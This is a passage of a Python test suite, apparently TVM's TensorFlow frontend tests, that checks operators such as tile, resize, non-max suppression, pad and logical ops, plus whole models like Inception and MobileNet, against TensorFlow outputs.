compare_tf_with_tvm([np_data], ["in_data:0"], [n.name for n in unstack])
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.stack(tf.unstack(in_data, axis=axis), axis=axis)
compare_tf_with_tvm([np_data], ["in_data:0"], "stack:0")
def test_forward_unstack():
"""test unstack layer"""
_test_unstack((6,), 0, "int32")
_test_unstack((2, 6), 1, "float64")
# negative axis
_test_unstack((1, 4), -1, "int32")
_test_unstack((3, 6, 4), -2, "float32")
#######################################################################
# Tile
# ----
def _test_tile(in_shape, multiples, dtype):
np_data = np.random.uniform(-5, 5, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.tile(in_data, multiples=multiples, name="tile")
compare_tf_with_tvm([np_data], ["in_data:0"], "tile:0")
def test_forward_tile():
"""test Tile"""
_test_tile((2,), (3,), "int32")
_test_tile((2, 2), (2, 3), "float32")
_test_tile((2, 4, 6), (6, 7, 8), "float64")
#######################################################################
# ClipByValue
# -----------
def _test_forward_clip_by_value(ip_shape, clip_value_min, clip_value_max, dtype):
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.clip_by_value(in_data, clip_value_min, clip_value_max, name="ClipByValue")
np_data = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
compare_tf_with_tvm([np_data], ["in_data:0"], "ClipByValue:0")
def test_forward_clip_by_value():
"""test ClipByValue op"""
if tf.__version__ < LooseVersion("1.9"):
_test_forward_clip_by_value((4,), 0.1, 5.0, "float32")
_test_forward_clip_by_value((4, 4), 1, 5, "int32")
#######################################################################
# Multi Input to graph
# --------------------
def test_forward_multi_input():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.int32, shape=[3, 3], name="in1")
in2 = tf.placeholder(tf.int32, shape=[3, 3], name="in2")
in3 = tf.placeholder(tf.int32, shape=[3, 3], name="in3")
in4 = tf.placeholder(tf.int32, shape=[3, 3], name="in4")
out1 = tf.add(in1, in2, name="out1")
out2 = tf.subtract(in3, in4, name="out2")
out = tf.multiply(out1, out2, name="out")
in_data = np.arange(9, dtype="int32").reshape([3, 3])
compare_tf_with_tvm(
[in_data, in_data, in_data, in_data], ["in1:0", "in2:0", "in3:0", "in4:0"], "out:0"
)
#######################################################################
# Multi Output to Graph
# ---------------------
def test_forward_multi_output():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.int32, shape=[3, 3], name="in1")
in2 = tf.placeholder(tf.int32, shape=[3, 3], name="in2")
in3 = tf.placeholder(tf.int32, shape=[3, 3], name="in3")
in4 = tf.placeholder(tf.int32, shape=[3, 3], name="in4")
out1 = tf.add(in1, in2, name="out1")
out2 = tf.subtract(in3, in4, name="out2")
in_data = np.arange(9, dtype="int32").reshape([3, 3])
in_data = [in_data] * 4
in_name = ["in1:0", "in2:0", "in3:0", "in4:0"]
out_name = ["out1:0", "out2:0"]
out_node = [out.strip(":0") for out in out_name]
in_node = [inp.strip(":0") for inp in in_name]
with tf.Session() as sess:
final_graph_def = tf.graph_util.convert_variables_to_constants(
sess,
sess.graph.as_graph_def(add_shapes=True),
out_node,
)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
tvm_output = run_tvm_graph(
final_graph_def, in_data, in_node, target="llvm", out_names=out_node, num_output=2
)
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
#######################################################################
# Resize Bilinear, Nearest_Neighbor
# ---------------------------------
def _test_resize_bilinear(in_shape, to_shape, align_corners):
"""One iteration of resize bilinear"""
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.image.resize_bilinear(in_data, shape_data, align_corners=align_corners)
compare_tf_with_tvm(data, "Placeholder:0", "ResizeBilinear:0")
def _test_resize_bilinear_from_tensor(in_shape, align_corners):
"""One iteration of resize bilinear with non-constant output shape, requires
value inference to get proper output shape."""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(
shape=[in_shape[0], None, None, in_shape[3]], dtype=data.dtype
)
to_shape = tf.shape(in_data)[1:3]
tf.image.resize_bilinear(in_data, to_shape, align_corners=align_corners)
compare_tf_with_tvm(data, "Placeholder:0", "ResizeBilinear:0")
def _test_resize_nearest_neighbor(in_shape, to_shape):
"""One iteration of resize nearest neighbor"""
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.image.resize_nearest_neighbor(in_data, shape_data, name="resize_nearest_neighbor")
compare_tf_with_tvm(data, "Placeholder:0", "resize_nearest_neighbor:0")
def _test_resize_nearest_neighbor_dynamic_shape(in_shape, scale):
"""One iteration of resize nearest neighbor for graph with dynamic input shape"""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=None, dtype=data.dtype)
# multiply input shape by scale factor
new_shape = tf.shape(in_data)[1:3] * tf.constant(scale, dtype=tf.int32)
tf.image.resize_nearest_neighbor(in_data, new_shape, name="resize_nearest_neighbor")
compare_tf_with_tvm(data, "Placeholder:0", "resize_nearest_neighbor:0")
def test_forward_resize():
"""Resize Bilinear, Nearest_Neighbor"""
# TF default layout is NHWC
_test_resize_bilinear((4, 32, 32, 3), [50, 50], False)
_test_resize_bilinear((6, 32, 32, 3), [20, 20], True)
_test_resize_bilinear_from_tensor((4, 32, 32, 3), False)
_test_resize_bilinear_from_tensor((6, 50, 50, 3), True)
_test_resize_nearest_neighbor((6, 32, 32, 3), [20, 20])
_test_resize_nearest_neighbor_dynamic_shape((1, 16, 16, 3), scale=[2, 2])
#######################################################################
# BroadcastArgs
# -----------
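# For reference: BroadcastArgs(s0, s1) returns the numpy-style broadcast shape of the two
# input shapes, e.g. s0=[4, 1, 32, 32] and s1=[4, 8, 32, 32] broadcast to [4, 8, 32, 32].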
def _test_broadcast_args(in_shape_1, in_shape_2):
"""One iteration of broadcast_args"""
shape_1 = np.array(in_shape_1).astype("int32")
shape_2 = np.array(in_shape_2).astype("int32")
with tf.Graph().as_default():
shape_1 = constant_op.constant(shape_1, shape=shape_1.shape, dtype=shape_1.dtype)
shape_2 = constant_op.constant(shape_2, shape=shape_2.shape, dtype=shape_2.dtype)
tf.raw_ops.BroadcastArgs(s0=shape_1, s1=shape_2)
compare_tf_with_tvm(None, "", "BroadcastArgs:0", opt_level=0)
def test_forward_broadcast_args():
"""Resize Bilinear"""
_test_broadcast_args((4, 1, 32, 32), [4, 8, 32, 32])
_test_broadcast_args((6, 32, 32, 1), [6, 32, 32, 16])
_test_broadcast_args((32, 32, 16), [6, 32, 32, 16])
#######################################################################
# BroadcastTo
# -----------
def _test_broadcast_to(in_shape, to_shape):
"""One iteration of broadcast_to"""
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.broadcast_to(in_data, shape_data)
compare_tf_with_tvm(data, "Placeholder:0", "BroadcastTo:0", opt_level=0)
def _test_broadcast_to_from_tensor(in_shape):
"""One iteration of broadcast_to with unknown shape at graph build"""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=[None], dtype=data.dtype)
shape_data = tf.multiply(tf.shape(in_data), 32)
tf.broadcast_to(in_data, shape_data)
compare_tf_with_tvm(data, "Placeholder:0", "BroadcastTo:0")
def test_forward_broadcast_to():
"""Resize Bilinear"""
_test_broadcast_to((4, 1, 32, 32), [4, 8, 32, 32])
_test_broadcast_to((6, 32, 32, 1), [6, 32, 32, 16])
    _test_broadcast_to_from_tensor((1,))
#######################################################################
# Fill
# ----
def _test_fill(in_shape):
"""Use the fill op to create a tensor of ones with non-constant shape."""
with tf.Graph().as_default():
tf.ones(shape=in_shape, dtype="float32")
compare_tf_with_tvm(in_shape, [], "ones:0", opt_level=1)
def _test_fill_from_tensor(in_shape):
"""Use the fill op to create a tensor of ones with non-constant shape.
Some extra ops need to be added here to prevent the graph from
being fully constant and folded away."""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(
shape=[in_shape[0], in_shape[1], None, None], dtype=data.dtype
)
x = tf.ones(shape=2 * tf.shape(in_data), dtype=data.dtype)
y = tf.math.add(in_data, tf.reduce_mean(x), name="out1")
compare_tf_with_tvm(data, "Placeholder:0", "out1:0")
def _test_fill_symbolic_inputs(in_shape_data, in_value_data, dtype):
with tf.Graph().as_default():
in_shape = tf.placeholder(shape=[in_shape_data.shape[0]], dtype=in_shape_data.dtype)
in_value = tf.placeholder(shape=(), dtype=dtype)
out = tf.fill(in_shape, in_value)
for mode in ["debug", "vm"]:
compare_tf_with_tvm(
[in_shape_data, in_value_data], [in_shape.name, in_value.name], out.name, mode=mode
)
def test_forward_fill():
"""Resize Bilinear"""
    _test_fill((32,))
_test_fill((6, 32, 64, 64))
_test_fill_from_tensor((6, 32, 64, 64))
_test_fill_symbolic_inputs(np.array((2,)), np.int32(9), tf.int32)
_test_fill_symbolic_inputs(np.array((2, 3)), 9, tf.int64)
_test_fill_symbolic_inputs(np.array((2, 3, 4)), np.float32(9.0), tf.float32)
#######################################################################
# Crop to bounding box
# --------------------
def _test_crop(in_shape, off_h, off_w, tar_h, tar_w):
"""Crop to bounding box"""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
tf.image.crop_to_bounding_box(in_data, off_h, off_w, tar_h, tar_w)
compare_tf_with_tvm(data, "Placeholder:0", "crop_to_bounding_box/Slice:0")
def test_forward_crop():
"""Crop to bounding box"""
_test_crop((1, 224, 224, 3), 20, 20, 120, 120)
#######################################################################
# CropAndResize
# -------------
def _test_forward_crop_and_resize(
img_shape,
boxes,
box_idx,
crop_size,
extrapolation_value=0.0,
method="bilinear",
dtype="float32",
):
image = np.random.uniform(0, 10, size=img_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = array_ops.placeholder(dtype, image.shape, name="in_data")
tf.image.crop_and_resize(
in_data,
boxes=boxes,
box_ind=box_idx,
crop_size=crop_size,
method=method,
extrapolation_value=extrapolation_value,
name="crop_and_resize",
)
compare_tf_with_tvm([image], ["in_data:0"], "crop_and_resize:0")
def test_forward_crop_and_resize():
"""CropAndResize"""
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3])
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3], 0.2)
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3], 0.2, "nearest")
_test_forward_crop_and_resize([1, 11, 11, 3], [[0.3, 0.3, 1, 1]], [0], [21, 21])
_test_forward_crop_and_resize([1, 41, 41, 3], [[0.2, 0.4, 0.8, 0.8]], [0], [21, 11])
_test_forward_crop_and_resize([1, 100, 100, 3], [[0, 0, 0.9, 0.9]], [0], [30, 30])
_test_forward_crop_and_resize([1, 224, 224, 3], [[0.1, 0.2, 1, 1]], [0], [9, 9])
_test_forward_crop_and_resize([1, 249, 249, 3], [[0, 0, 1, 1]], [0], [9, 9])
_test_forward_crop_and_resize([1, 201, 301, 3], [[0.2, 0.3, 0.7, 0.8]], [0], [51, 51])
_test_forward_crop_and_resize(
img_shape=[10, 11, 11, 3],
boxes=[[0, 0, 0.9, 0.9], [0.2, 0.2, 0.8, 0.8]],
box_idx=[0, 1],
crop_size=[5, 5],
)
_test_forward_crop_and_resize(
img_shape=[20, 576, 576, 3],
boxes=[[0, 0, 1, 1], [0, 0, 0.8, 0.8], [0.1, 0.2, 0.9, 1], [0.2, 0, 1, 1]],
box_idx=[1, 0, 2, 3],
crop_size=[24, 24],
extrapolation_value=0.3,
)
_test_forward_crop_and_resize(
img_shape=[20, 229, 229, 3],
boxes=[[0, 0, 0.9, 0.9], [0.3, 0.3, 1, 1], [0.2, 0.1, 0.7, 0.8], [0, 0, 1, 1]],
box_idx=[3, 0, 2, 1],
crop_size=[58, 58],
extrapolation_value=0.2,
method="nearest",
)
#######################################################################
# Non Max Suppression
# -------------------
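# For reference: non_max_suppression greedily selects the highest-scoring boxes, drops any
# box whose IoU with an already selected box exceeds iou_threshold (or whose score is below
# score_threshold), and returns at most max_output_size indices.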
def _test_forward_nms_v3(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.non_max_suppression(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
"nms/NonMaxSuppressionV3:0",
mode="vm",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
"nms/NonMaxSuppressionV3:0",
mode="debug",
)
def _test_forward_nms_v4(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
indices_padded, num_valid = tf.image.non_max_suppression_padded(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
pad_to_max_output_size=True,
)
num_valid = tf.reshape(num_valid, shape=(-1,))
indices_padded = tf.reshape(indices_padded, shape=(-1,))
tf.slice(indices_padded, tf.constant([0]), num_valid, name="SlicedIndices")
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV4:1", "SlicedIndices:0"],
mode="vm",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV4:1", "SlicedIndices:0"],
mode="debug",
)
def _test_forward_nms_v5(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.non_max_suppression_with_scores(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV5:0", "nms/NonMaxSuppressionV5:1"],
mode="vm",
)
def test_forward_nms():
"""NonMaxSuppressionV3,5"""
for _test_forward_nms in [_test_forward_nms_v3, _test_forward_nms_v5]:
_test_forward_nms((5, 4), (5,), 0.7, 0.5, 5)
_test_forward_nms((20, 4), (20,), 0.5, 0.6, 10)
_test_forward_nms((1000, 4), (1000,), 0.3, 0.7, 1000)
_test_forward_nms((2000, 4), (2000,), 0.4, 0.6, 7)
def _test_forward_combined_nms(
bx_shape,
score_shape,
iou_threshold,
score_threshold,
out_size,
total_size,
clip_boxes=False,
dtype="float32",
):
boxes = np.random.uniform(-1, 2, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.combined_non_max_suppression(
boxes=in_data_1,
scores=in_data_2,
max_output_size_per_class=in_data_3,
max_total_size=total_size,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
pad_per_class=False,
clip_boxes=clip_boxes,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
[
"nms/CombinedNonMaxSuppression:0",
"nms/CombinedNonMaxSuppression:1",
"nms/CombinedNonMaxSuppression:2",
"nms/CombinedNonMaxSuppression:3",
],
mode="vm",
)
def test_forward_combined_nms():
"""CombinedNonMaxSuppression"""
_test_forward_combined_nms((1, 64, 1, 4), (1, 64, 1), 0.7, 0.5, 64, 64)
_test_forward_combined_nms((1, 64, 1, 4), (1, 64, 20), 0.7, 0.5, 64, 10)
_test_forward_combined_nms((1, 64, 20, 4), (1, 64, 20), 0.7, 0.5, 64, 64, clip_boxes=True)
_test_forward_combined_nms((2, 200, 1, 4), (2, 200, 1), 0.4, 0.6, 100, 100)
#######################################################################
# LSTM
# ----
def _test_lstm_cell(batch_size, num_hidden, num_layers, forget_bias, dtype):
"""One iteration of a LSTM cell"""
tf.reset_default_graph()
input_size = num_hidden
input_data = np.full((batch_size, input_size), 1.0, dtype=dtype)
in_state_c = np.full((batch_size, num_hidden), 0.1, dtype=dtype)
in_state_h = np.full((batch_size, num_hidden), 0.1, dtype=dtype)
def _get_tensorflow_output():
with tf.Session() as sess:
with variable_scope.variable_scope(
"root", initializer=init_ops.constant_initializer(0.5)
):
m0 = tf.placeholder(dtype, [batch_size, num_hidden], name="m0")
m1 = tf.placeholder(dtype, [batch_size, num_hidden], name="m1")
x = tf.placeholder(shape=(batch_size, input_size), dtype=dtype, name="input")
g, ((out_m0, out_m1)) = tensorflow.contrib.rnn.LSTMBlockCell(
num_hidden, forget_bias=forget_bias
)(x, (m0, m1))
sess.run([variables.global_variables_initializer()])
res = sess.run(
[g, out_m0, out_m1],
{
x.name: np.array([[1.0, 1.0]]),
m0.name: in_state_c,
m1.name: in_state_h,
},
)
graph_def = sess.graph.as_graph_def(add_shapes=True)
final_graph_def = graph_util.convert_variables_to_constants(
sess, graph_def, ["root/lstm_cell/LSTMBlockCell"]
)
return final_graph_def, res
graph_def, tf_out = _get_tensorflow_output()
tvm_output = run_tvm_graph(
graph_def,
[input_data, in_state_c, in_state_h],
["root/input", "root/m0", "root/m1"],
num_output=7,
)
assert isinstance(tvm_output, list)
tvm.testing.assert_allclose(tf_out[0], tvm_output[6], rtol=1e-3, atol=1e-3)
tvm.testing.assert_allclose(tf_out[1], tvm_output[1], rtol=1e-3, atol=1e-3)
def test_forward_lstm():
"""test LSTM block cell"""
if package_version.parse(tf.VERSION) < package_version.parse("2.0.0"):
# in 2.0, tf.contrib.rnn.LSTMBlockCell is removed
_test_lstm_cell(1, 2, 1, 0.5, "float32")
#######################################################################
# Pack
# ---
def _test_pack(axis, shape, **kwargs):
a = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
b = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
with tf.Graph().as_default():
tf_a = array_ops.placeholder(shape=shape, dtype="float32", name="pl_a")
tf_b = array_ops.placeholder(shape=shape, dtype="float32", name="pl_b")
tf_c = tf.stack([tf_a, tf_b], axis=axis, **kwargs)
assert tf_c.op.op_def.name == "Pack", "tf.stack() is expected to produce 'Pack' operation"
compare_tf_with_tvm([a, b], ["pl_a:0", "pl_b:0"], "stack:0")
def test_forward_pack():
for axis in range(-3, 3):
_test_pack(axis, [3, 2, 1])
for axis in range(-1, 1):
_test_pack(axis, [3])
_test_pack(0, [])
#######################################################################
# Unpack
# ------
def _test_forward_unpack(in_shape, axis, dtype):
"""test operator Unpack"""
np_data = np.random.uniform(-100, 100, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.unstack(in_data, axis=axis, name="Unpack")
compare_tf_with_tvm([np_data], ["in_data:0"], "Unpack:0")
def test_forward_unpack():
_test_forward_unpack((3,), 0, "int32")
_test_forward_unpack((3,), -1, "int16")
_test_forward_unpack((21, 23, 3), 2, "float32")
#######################################################################
# Range
# -----
def test_forward_range():
"""test operator Range"""
for dtype in [tf.int32, tf.int64]:
tf.reset_default_graph()
with tf.Graph().as_default():
tf.range(1, 18, 3, name="range", dtype=dtype)
compare_tf_with_tvm([], [], "range:0")
"""test type assignment for operator Range"""
tf.reset_default_graph()
with tf.Graph().as_default():
tf.range(1, 256 + 1, 1, dtype=tf.float32)
compare_tf_with_tvm([], [], "range:0")
#######################################################################
# Pad
# ---
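# For reference: `paddings` lists [before, after] per dimension, so each output dimension is
# before + input + after, e.g. shape (2, 3) with [[1, 1], [2, 2]] pads to (4, 7). REFLECT
# mirrors without repeating the edge row/column, SYMMETRIC mirrors including the edge.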
def _test_pad(input_shape, paddings, mode, **kwargs):
"""One iteration of pad operation with given shape"""
x = np.arange(np.prod(input_shape), dtype=np.float32).reshape(input_shape)
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
pad_values = constant_op.constant(paddings)
pad = tf.pad(in_data, paddings=pad_values, mode=mode, **kwargs)
if mode == "CONSTANT":
if "constant_values" in kwargs:
out_name = "PadV2:0"
else:
out_name = "Pad:0"
else:
out_name = "MirrorPad:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name)
def test_forward_pad():
"""Pad"""
_test_pad((2, 3), [[1, 1], [2, 2]], mode="CONSTANT")
_test_pad((2, 3), [[1, 1], [2, 2]], mode="CONSTANT", constant_values=1.0)
_test_pad((2, 3), [[1, 1], [2, 2]], mode="SYMMETRIC")
_test_pad((2, 3), [[1, 1], [2, 2]], mode="REFLECT")
#######################################################################
# Logical operators
# --------------------
def test_logical_and():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_and(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_or():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_or(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_xor():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_xor(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_not():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
out = tf.logical_not(in1, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm(in_data1, "in1:0", "out:0")
def test_forward_logical():
test_logical_and()
test_logical_or()
test_logical_xor()
test_logical_not()
#######################################################################
# Where, Select, SelectV2
# -------------
def test_forward_where():
"""Where: return elements depending on conditions"""
with tf.Graph().as_default():
with tf.Session() as sess:
input1 = tf.placeholder(tf.int32, shape=[1, 4, 4, 3], name="input1")
input2 = tf.placeholder(tf.int32, shape=[1, 4, 4, 3], name="input2")
mask = input1 > input2
tf.where(mask, input1 + 1, input2 * 2)
in_data1 = np.random.uniform(0, 10, size=(1, 4, 4, 3)).astype("uint32")
in_data2 = np.random.uniform(0, 10, size=(1, 4, 4, 3)).astype("uint32")
compare_tf_with_tvm([in_data1, in_data2], ["input1:0", "input2:0"], "Select:0")
#######################################################################
# Inception V3
# ------------
def test_forward_inception_v3():
"""test inception V3 model"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"InceptionV3/inception_v3_2016_08_28_frozen-with_shapes.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 299, 299, 3)).astype("float32")
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "input:0", "InceptionV3/Predictions/Reshape_1:0")
tvm_output = run_tvm_graph(graph_def, data, "input")
tvm.testing.assert_allclose(tf_output[0], tvm_output[0], rtol=1e-5, atol=1e-5)
#######################################################################
# Inception V1
# ------------
def test_forward_inception_v1():
"""test inception V1 model"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload("InceptionV1/classify_image_graph_def-with_shapes.pb")
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
# Build an image from random data.
from PIL import Image
from tvm.contrib import utils
img_array = np.random.uniform(size=(1, 600, 600, 3)).astype("uint8")
img = Image.frombuffer("RGB", (600, 600), img_array.tostring(), "raw", "RGB", 0, 1)
temp = utils.tempdir()
img_path = temp.relpath("tf-test.jpg")
img.save(img_path)
import os.path
if not tf.gfile.Exists(os.path.join(img_path)):
tf.logging.fatal("File does not exist %s", img_path)
data = tf.gfile.FastGFile(os.path.join(img_path), "rb").read()
temp.remove()
# Extract tensorflow decoded image frame for tvm input
with tf.Session() as sess:
tvm_data = run_tf_graph(sess, data, "DecodeJpeg/contents:0", "DecodeJpeg:0")
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "DecodeJpeg/contents:0", "softmax:0")
tvm_output = run_tvm_graph(graph_def, tvm_data, "DecodeJpeg/contents")
tvm.testing.assert_allclose(tf_output[0], tvm_output[0], rtol=1e-5, atol=1e-5)
#######################################################################
# Mobilenet
# ---------
def test_forward_mobilenet():
"""test mobilenet model"""
# MobilenetV2
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"https://storage.googleapis.com/mobilenet_v2/checkpoints/mobilenet_v2_1.4_224.tgz",
"mobilenet_v2_1.4_224_frozen.pb",
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 224, 224, 3)).astype("float32")
out_node = "MobilenetV2/Predictions/Reshape_1"
with tf.Session() as sess:
# Add shapes to the graph.
graph_def = tf_testing.AddShapesToGraphDef(sess, out_node)
tf_output = run_tf_graph(sess, data, "input:0", out_node + ":0")
tvm_output = run_tvm_graph(graph_def, data, "input")
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# ResnetV2
# --------
@tvm.testing.requires_gpu
def test_forward_resnetv2():
"""test resnet model"""
if is_gpu_available():
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"ResnetV2/resnet-20180601_resnet_v2_imagenet-shapes.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(128, 224, 224, 3)).astype("float32")
out_node = "ArgMax"
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "input_tensor:0", out_node + ":0")
for device in ["llvm", "cuda"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def, data, "input_tensor", len(tf_output), target=device
)
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# SSD
# ---
def _test_ssd_impl():
"""Test SSD with backbone MobileNet V1"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"object_detection/ssd_mobilenet_v1_ppn_shared_"
"box_predictor_300x300_coco14_sync_2018_07_03.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(0.0, 255.0, size=(1, 512, 512, 3)).astype("uint8")
in_node = "image_tensor"
out_node = ["detection_boxes", "detection_scores", "detection_classes"]
with tf.Session() as sess:
tf_output = run_tf_graph(
sess, data, "{}:0".format(in_node), ["{}:0".format(oname) for oname in out_node]
)
# TODO(kevinthesun): enable gpu test when VM heterogeneous execution is ready.
for device in ["llvm"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
